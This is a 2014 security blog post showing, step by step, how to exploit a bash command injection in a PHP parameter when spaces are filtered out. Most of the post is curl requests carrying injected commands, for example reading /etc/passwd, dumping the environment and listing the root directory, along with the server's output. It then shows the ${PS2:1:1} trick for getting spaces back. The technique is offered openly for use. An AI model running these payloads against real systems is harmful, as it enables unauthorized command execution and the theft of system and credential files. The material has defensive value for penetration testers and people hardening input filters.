Too Cool for Internet Explorer

giovedì 24 luglio 2014

Bypassing bash command injections restrictions

I recently needed a way to execute arbitrary bash commands without using spaces during the injection.
Assume this example blackbox scenario, where we found some bash command injetion, but some commands are filtered/not executed:
$(id):
$ curl "http://target/path/vulnerable.php?vulnvar=$(id)"
uid=48(apache) gid=48(apache) groups=14(uucp),48(apache),501(nagios),600(nagiocmd)
$(ls):
$ curl "http://target/path/vulnerable.php?vulnvar=$(ls)"
vulnerable.php
index.php
$(cat /etc/passwd):
$ curl "http://target/path/vulnerable.php?vulnvar=$(cat /etc/passwd)"
[no output]
(space filtered? or no permissions + stderr not forwarded? lets check it out..) $(ls >/tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(ls >/tmp/test)"
[no output]
$(cat</tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(cat</tmp/test)"
[no output]
(maybe the ls before was not executed) $(ls>/tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(ls>/tmp/test)"
[no output]
$(cat</tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(cat</tmp/test)"
vulnerable.php
index.php
we got it! it's the space that is filtered out and prevents our injection to be successful.
but how we manage to execute a command that needs a parameter without using a space?
The solution is to get out a space in some "bash way", and here the Shell Parameter expansion comes to play. With this functionality we can extract a substring from a arbitrary variable:
${parameter:offset:length}

Expands to up to length characters of parameter starting at the character specified by offset. If length is omitted, expands to the substring of parameter starting at the character specified by offset. length and offset are arithmetic expressions (see Shell Arithmetic). This is referred to as Substring Expansion.

First we need to fine some variable containing a 'space' char, so search it in the current environment:
$(declare>/tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(declare>/tmp/test)"
[no output]
$(cat</tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(cat</tmp/test)"
[...]
LESSOPEN='|/usr/bin/lesspipe.sh %s'
LINES=39
MAIL=/var/spool/mail/root
MAILCHECK=60
OLDPWD=/root
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/opt/ruby192/bin:/root/bin
PIPESTATUS=([0]="0")
PPID=8851
PRELINKING=yes
PRELINK_FULL_TIME_INTERVAL=14
PRELINK_NONRPM_CHECK_INTERVAL=7
PRELINK_OPTS=-mR
PROMPT_COMMAND='printf "\033]0;%s@%s:%s\007" "${USER}" "${HOSTNAME%%.*}" "${PWD/#$HOME/~}"'
PS1='[\u@\h \W]\$ '
PS2='> '
PS4='+ '
[...]

so in this case we can use LESSOPEN, PS2, PS4 or some other variable, lets take PS2 for semplicity, and extract its space char:
${PS2:1:1}

now we can write arbitrary commands with parameters (and spaces) substituting each space with the ${PS2:1:1} string: $(ls${PS2:1:1}-l${PS2:1:1}/):
$ curl "http://target/path/vulnerable.php?vulnvar=$(ls${PS2:1:1}-l${PS2:1:1}/)"
drwxr-xr-x   2 root   root    4096 May  7 11:20 bin
drwxr-xr-x   4 root   root    3072 May 30  2012 boot
drwxr-xr-x   6 nagios neteye  4096 Aug 21  2013 data
drwxr-xr-x  10 root   root    3960 Jun 26 18:05 dev
drwxr-xr-x 126 root   root   12288 Jul 23 04:04 etc
drwxr-xr-x   5 root   root    4096 Jun 23 11:38 home
-rw-r--r--   1 root   root      31 Feb  4  2011 ks.log
drwxr-xr-x  14 root   root   12288 May  7 11:20 lib
drwx------   2 root   root   16384 Sep 25  2010 lost+found
drwxr-xr-x   3 root   root    4096 Jun 13 14:12 media
drwxr-xr-x   2 root   root    4096 Apr 20  2012 misc
drwxr-xr-x   2 root   root    4096 Aug 21  2013 mnt
dr-xr-xr-x   2 root   root    4096 May 10  2011 net
drwxr-xr-x   5 root   root    4096 Mar 26 17:20 opt
dr-xr-xr-x 131 root   root       0 Jun 13 14:12 proc
drwxr-x---  58 root   root   16384 Jul 24 09:26 root
drwxr-xr-x   2 root   root   12288 May  7 11:20 sbin
drwxr-xr-x   2 root   root    4096 May 11  2011 selinux
drwxr-xr-x   2 root   root    4096 May 11  2011 srv
drwxr-xr-x  11 root   root       0 Jun 13 14:12 sys
drwxrwxrwt   7 root   root   28672 Jul 24 11:47 tmp
drwxr-xr-x  15 root   root    4096 Oct 19  2011 usr
drwxr-xr-x  30 root   root    4096 Jul 18 09:06 var

happy hacking ;)

Nessun commento: